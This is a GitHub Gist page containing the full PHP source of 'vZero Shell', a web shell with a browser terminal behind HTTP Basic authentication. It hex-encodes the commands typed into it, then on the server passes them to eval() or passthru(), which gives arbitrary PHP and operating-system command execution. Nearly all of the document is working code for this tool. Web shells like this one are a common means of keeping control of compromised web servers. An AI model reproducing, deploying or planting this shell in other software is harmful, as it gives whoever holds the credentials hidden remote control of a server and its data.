Created
July 16, 2016 17:30
-
-
Save max-dark/faaa1ba3387c8659afa09b38265d2e2c to your computer and use it in GitHub Desktop.
v Zero Shell - simple web-based CLI
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
________ | |
\___ _/ ___ _ __ ___ | |
.-. ,-, / / / _ \| .-\| / \ | |
\ \/ / _/ /__ | __/| | | | | | |
\__/ /______\\___||_| \___/ | |
______ _ ___ _ _ | |
/ _____\| |___ / _ \| || | | |
\_____ \| ,-. || __/| || | | |
\______/|_| |_|\___/|_||_| | |
vzsh.php (c)oded by Max Dark | |
*/ | |
// don't forget to change before upload to server | |
/** @var string $name default=md5("admin") */ | |
$name = '21232f297a57a5a743894a0e4a801fc3'; | |
/** @var string $pass default=md5("MyVeryLongPassword:)!ChangeMe!") */ | |
$pass = '5bad8c29d2db14e438e1c4e01497ef03'; | |
/** @var string $auth_prompt */ | |
$auth_prompt = 'vZero Shell Authorization'; | |
/** | |
* @return string | |
*/ | |
function logo() { | |
$logo = <<<'TXT' | |
________ | |
\___ _/ ___ _ __ ___ | |
.-. ,-, / / / _ \| .-\| / \ | |
\ \/ / _/ /__ | __/| | | | | | |
\__/ /______\\___||_| \___/ | |
______ _ ___ _ _ | |
/ _____\| |___ / _ \| || | | |
\_____ \| ,-. || __/| || | | |
\______/|_| |_|\___/|_||_| | |
vzsh.php (c)oded by Max Dark | |
TXT; | |
return $logo; | |
} | |
if ( ! isset( $_SERVER['PHP_AUTH_USER'] ) ) { | |
header( "WWW-Authenticate: Basic realm=\"$auth_prompt\"" ); | |
header( 'HTTP/1.0 401 Unauthorized' ); | |
echo "Bad boy(girl?)"; | |
exit; | |
} else { | |
if ( ( md5( $_SERVER['PHP_AUTH_USER'] ) !== $name ) || ( md5( $_SERVER['PHP_AUTH_PW'] ) !== $pass ) ) { | |
header( "WWW-Authenticate: Basic realm=\"$auth_prompt\"" ); | |
header( 'HTTP/1.0 401 Unauthorized' ); | |
echo "Bad boy(girl?)"; | |
exit; | |
} | |
} | |
/** | |
* outShell | |
* | |
*/ | |
function outShell() { | |
?><html> | |
<head><title>vZero Shell</title> | |
<script> | |
var httpObj = null; | |
//var vzDebug=false; | |
function getObject(id) { | |
return document.getElementById(id); | |
} | |
function getContainer() { | |
return getObject('ifrm').document.getElementById('vzshContainer'); | |
} | |
function ShowResult(text) { // добавляем результат обработки команды | |
var obj = getContainer(); | |
if (obj) { | |
obj.innerHTML = obj.innerHTML + '<pre>' + text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">") + '</pre>'; | |
getObject('ifrm').scrollBy(0, 10000); | |
} | |
} | |
// История комманд | |
var vzHistory = [];//command list | |
var vzHistPos = -1;//history position | |
function historyAdd(cmd) { | |
if (cmd == '') | |
return; | |
var hlen = vzHistory.length; | |
for (var i = hlen - 1; i >= 0; i--) { | |
if (cmd == vzHistory[i]) { | |
vzHistPos = hlen; | |
return; | |
} | |
} | |
vzHistory[hlen] = cmd; | |
vzHistPos = vzHistory.length; | |
} | |
function showHistory() { | |
var hist = "Command history:\n"; | |
var hlen = vzHistory.length; | |
if (hlen < 1) { | |
hist = hist + "\tEmpty\n"; | |
} | |
for (var i = 0; i < hlen; i++) { | |
hist = hist + i + ' ' + vzHistory[i] + "\n"; | |
} | |
ShowResult(hist); | |
} | |
function historyUp() { | |
var cmdObj = getCMDLine(); | |
if (vzHistPos - 1 >= 0) { | |
vzHistPos--; | |
cmdObj.value = vzHistory[vzHistPos]; | |
} else { | |
cmdObj.value = ''; | |
vzHistPos = -1; | |
} | |
} | |
function historyDown() { | |
var cmdObj = getObject('vzerocmd'); | |
if (vzHistPos + 1 < vzHistory.length) { | |
vzHistPos++; | |
cmdObj.value = vzHistory[vzHistPos]; | |
} else { | |
cmdObj.value = ''; | |
vzHistPos = vzHistory.length; | |
} | |
} | |
// encode query | |
var vzHex = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']; | |
function dec2hex(num) {// convert dec -> hex | |
var res = vzHex[num % 16]; | |
num = Math.floor(num / 16); | |
res = vzHex[num % 16] + '' + res; | |
return res; | |
} | |
function encode(str) { // Кодирование строки в шенацетиричный вид(для обхода Magic Quotes) | |
var res = ''; | |
var len = str.length; | |
for (var i = 0; i < len; i++) { | |
res = res + dec2hex(str.charCodeAt(i)); | |
} | |
return res; | |
} | |
/* | |
function decode(str) { // Декодирование строки из шенацетиричного вида | |
str=str.toLowerCase(); | |
var res=''; | |
len=Math.floor(str.length/2)*2; | |
for(var i=0;i<len;i+=2) { | |
res=res+String.fromCharCode(eval('0x'+str.substr(i,2))); | |
} | |
return res; | |
} | |
*/ | |
function showHelp() { | |
var hlp = "Please write it!!!\n" + | |
"vZero is an Interactive Web Shell with command history\n" + | |
"Keys:\n\tCTRL+Up/Down - history up/down\n" + | |
"\tEnter - send command\n\tEsc - clear cmd line\n" + | |
"Commands start with '$' will be translated into php code and executed on server\n" + | |
"\tExample : $echo(\"\\$_SERVER = \");print_r($_SERVER);\n" + | |
"Supported commands:\n\tAll Server OS commands + \n" + | |
"\t!help - show this info\n\t!history - show command history\n" + | |
"\t!n , where n - number of command in history\n" + | |
"\t!cls - clear screen\n"; | |
ShowResult(hlp); | |
} | |
function getCMDLine() { | |
return getObject('vzerocmd'); | |
} | |
function execInternalCommand(cmd) { | |
if (cmd == 'history') { | |
showHistory(); | |
} else if (cmd == 'help') { | |
showHelp(); | |
} else if (cmd == 'cls') { | |
getContainer().innerHTML = ''; | |
} else { | |
var idx = parseInt(cmd); | |
if (isNaN(idx)) { | |
ShowResult("Invalid command : !" + cmd + "\n"); | |
} else { | |
if ((idx >= 0) && (idx < vzHistory.length)) { | |
getCMDLine().value = vzHistory[idx]; | |
sendQuery(); | |
} | |
} | |
} | |
} | |
function writeIframe(idoc) { | |
idoc.write( | |
"<html><head><style type='text/css'>" + | |
"body{background-color :black;color:#d3d3d3;border : none;" + | |
"font-family:Courier New,Verdana,monospace;" + | |
"font-size:12px;" + | |
"scrollbar-face-color:#191919;" + | |
"scrollbar-shadow-color:#505050;" + | |
"scrollbar-highlight-color:#505050;" + | |
"scrollbar-3dlight-color:black;" + | |
"scrollbar-darkshadow-color:black;" + | |
"scrollbar-track-color:#191919;" + | |
"scrollbar-arrow-color:#505050;}" + | |
"</style></head><body>< id=vzshContainer><code>vZero Shell\ntype '!help' for more info</code></pre></body></html>" | |
); | |
idoc.close(); | |
} | |
function hKeyDown(event) { | |
var c = (typeof(event.which) == 'number') ? event.which : ( | |
(typeof(event.keyCode) == 'number') ? event.keyCode : ( | |
(typeof(event.charCode) == 'number') ? event.charCode : 0 | |
) | |
); | |
switch (c) { | |
case 13://enter | |
sendQuery(); | |
break; | |
case 27://Escape | |
clearCmd(); | |
break; | |
case 38://Up | |
if (event.ctrlKey) { | |
historyUp(); | |
} | |
break; | |
case 40://Down | |
if (event.ctrlKey) { | |
historyDown(); | |
} | |
break; | |
} | |
return true; | |
} | |
function httpObjReady() { | |
var w = window; | |
switch (httpObj.readyState) { | |
case 0: | |
break; | |
case 1: | |
w.status = 'Connecting to server ...'; | |
break; | |
case 2: | |
w.status = 'Send command'; | |
break; | |
case 3: | |
w.status = 'Load result'; | |
break; | |
case 4: | |
ShowResult(httpObj.responseText); | |
w.status = 'Ready. Server status : ' + httpObj.status + ' ' + httpObj.statusText; | |
break; | |
} | |
} | |
function clearCmd() { // Clear command line | |
var cmdObj = getCMDLine(); | |
cmdObj.value = ''; | |
cmdObj.focus(); | |
} | |
function sendQuery() { | |
var cmdObj = getCMDLine(); | |
if (cmdObj.value.charAt(0) == '!') { | |
execInternalCommand(cmdObj.value.substring(1, cmdObj.value.length)); | |
} else { | |
historyAdd(cmdObj.value); | |
if (window.XMLHttpRequest) { | |
httpObj = new XMLHttpRequest(); | |
httpObj.onload = httpObjReady; | |
} else if (window.ActiveXObject) { | |
httpObj = new ActiveXObject("Microsoft.XMLHTTP"); | |
httpObj.onreadystatechange = httpObjReady; | |
} else { | |
httpObj = null; | |
} | |
if (httpObj) { | |
httpObj.open("POST", '<?php echo $_SERVER['PHP_SELF'];?>', true); | |
httpObj.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); | |
httpObj.send('vzerocmd=' + encode(cmdObj.value)); | |
} | |
} | |
cmdObj.value = ''; | |
cmdObj.focus(); | |
return true; | |
} | |
</script> | |
<style type='text/css'> | |
body, iframe, input { | |
background-color: black; | |
color: #d3d3d3; | |
border: none; | |
font-family: Courier New, Verdana, monospace; | |
font-size: 12px; | |
scrollbar-face-color: #191919; | |
scrollbar-shadow-color: #505050; | |
scrollbar-highlight-color: #505050; | |
scrollbar-3dlight-color: black; | |
scrollbar-darkshadow-color: black; | |
scrollbar-track-color: #191919; | |
scrollbar-arrow-color: #505050; | |
} | |
input.shell_control { | |
background-color: #191919; | |
border: solid 1px #505050; | |
color: #505050 | |
} | |
input.shell_text { | |
background-color: #191919; | |
border: solid 1px #303030; | |
color: #d3d3d3 | |
} | |
</style> | |
</head> | |
<body> | |
<iframe id=ifrm name=ifrm width=96% height=90% src='' style="border: 0"></iframe> | |
<br/> | |
<nobr> | |
><input placeholder="enter command" id=vzerocmd class=shell_text size=120 onkeydown='hKeyDown(event);'> | |
<input type=button class=shell_control value=send onclick='sendQuery();'> | |
<input type=button class=shell_control value=clear onclick='clearCmd();'> | |
</nobr> | |
<script>writeIframe(getObject('ifrm').document); | |
getObject('vzerocmd').focus();</script> | |
</body> | |
</html><?php | |
} | |
/* | |
function hex_encode($str) { | |
$len=strlen($str); | |
$i=0; | |
$res=''; | |
for($i=0;$i<$len;$i++) { | |
$c=ord($str[$i]); | |
if($c!=0x0) { | |
if($c<0x10) | |
$res.='0'; | |
$res.=dechex($c); | |
} else { | |
$res.='00'; | |
} | |
} | |
return $res; | |
}*/ | |
function hex_decode( $str ) { | |
$len = floor( strlen( $str ) / 2 ) * 2; | |
$res = ''; | |
for ( $i = 0; $i < $len; $i += 2 ) { | |
$res .= chr( hexdec( ( $str[ $i ] ) . ( $str[ $i + 1 ] ) ) ); | |
} | |
return $res; | |
} | |
/** | |
* @param string $cmd | |
*/ | |
function executeQuery( $cmd ) { | |
if ( empty( $cmd ) ) { | |
echo logo(); | |
} else { | |
$cmd = hex_decode( $cmd ); | |
echo getcwd() . ">$cmd\n"; | |
if ( $cmd[0] == '$' ) { | |
$cmd = substr( $cmd, 1, strlen( $cmd ) - 1 ); | |
echo "Eval $cmd :\n"; | |
echo eval( $cmd ); | |
} else { | |
passthru( $cmd ); | |
} | |
} | |
} | |
if ( isset( $_POST['vzerocmd'] ) ) { | |
executeQuery( $_POST['vzerocmd'] ); | |
} else { | |
outShell(); | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment